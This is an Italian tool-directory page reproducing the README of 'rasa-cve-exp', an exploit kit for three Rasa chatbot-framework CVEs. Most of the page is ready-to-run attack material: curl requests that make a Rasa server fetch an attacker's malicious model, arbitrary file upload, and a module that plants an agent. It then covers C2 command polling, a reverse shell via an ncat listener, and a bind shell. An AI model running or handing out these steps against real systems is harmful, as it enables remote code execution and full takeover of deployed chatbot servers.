Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
Strumenti/GitHubGitHub/lierbushiwo/rasa-cve-exp
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

Eseguilo direttamente

root@kitploit:~
python server-1.py

image-20260604134536291

Upload di file arbitrario

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

Risultato:

image-20260604135232815

CVE-2021-41127

  • server-1.py

Nome del modello predefinito evil_import_model.tar.gz

Modello dannoso demo

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

Imposta una regola di dialogo dannosa

Inserisci greet e ottieni PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

Risultato:

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py modifica i dati specificati all'interno dell'archivio compresso

Eseguilo direttamente: per impostazione predefinita legge il modello dalla directory /model, lo modifica e lo salva nella directory corrente come evil_import_model.tar.gz

image-20260604143558105

Specifica l'IP per la reverse shell

Nome del modello predefinito evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

Invia i dati in sequenza

Altre tecniche di exploit

Negli scenari reali possono esserci differenze

  • server-2.py

Tre modalità


Modalità C2 (polling HTTP, consigliata)

root@kitploit:~
Attaccante                     Contenitore Rasa (target)
  │                            │
  ├─ avvia server-2.py ────────┤
  ├─ PUT /model ──→ scarica pwnmod.py in /app/
  ├─ PUT /model ──→ scarica il modello dannoso → import pwnmod → avvio agent
  │                            │
  │  ← GET /poll?agent=xxx ───┤  polling ogni 3s
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  riceve il comando
  │  ← POST /result ──────────┤  invia il risultato
  ├─ /last?agent=xxx ──→ legge il risultato
root@kitploit:~
# Avvio dal lato attaccante
python server-2.py --mode c2 --c2-base-url http://<IP_attaccante>:8000 --port 8000

# Trigger dell'exploit (due passaggi)
curl -X PUT http://<indirizzo_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaccante>:8000/write-module"}}'

curl -X PUT http://<indirizzo_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaccante>:8000/model"}}'

# Invia un comando
curl "http://<IP_attaccante>:8000/enqueue?cmd=id"

# Attendi 8 secondi e leggi il risultato (polling ogni 3s + tempo di esecuzione)
curl "http://<IP_attaccante>:8000/last?agent=<hostname>"

# Puoi anche non specificare l'agent (usa il wildcard)
curl "http://<IP_attaccante>:8000/enqueue?cmd=whoami"
curl "http://<IP_attaccante>:8000/last"

Modalità Reverse (reverse shell)

root@kitploit:~
# 1) Avvia l'ascolto sul lato attaccante
ncat -lvnp 4444

# 2) Avvia server-2.py sul lato attaccante
python server-2.py --mode reverse --reverse-host <IP_attaccante> --reverse-port 4444 --port 8000

# 3) Trigger dell'exploit
curl -X PUT http://<indirizzo_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaccante>:8000/write-module"}}'

curl -X PUT http://<indirizzo_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaccante>:8000/model"}}'

# 4) nc riceve il prompt $, interazione diretta

Modalità Bind (shell diretta, meno comune)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# L'agent ascolta su 0.0.0.0:4444 nel container target
# ncat <IP_target> 4444 per connettersi

Note su porte e indirizzi

Parametro
Scarica lo strumento
Significato
--port 8000Porta di ascolto di server-2.py
--c2-base-urlBase URL completo per il polling dell'agent in modalità C2 (deve essere un indirizzo raggiungibile dal container)
--reverse-hostIP di destinazione della reverse shell
--reverse-portPorta di destinazione della reverse shell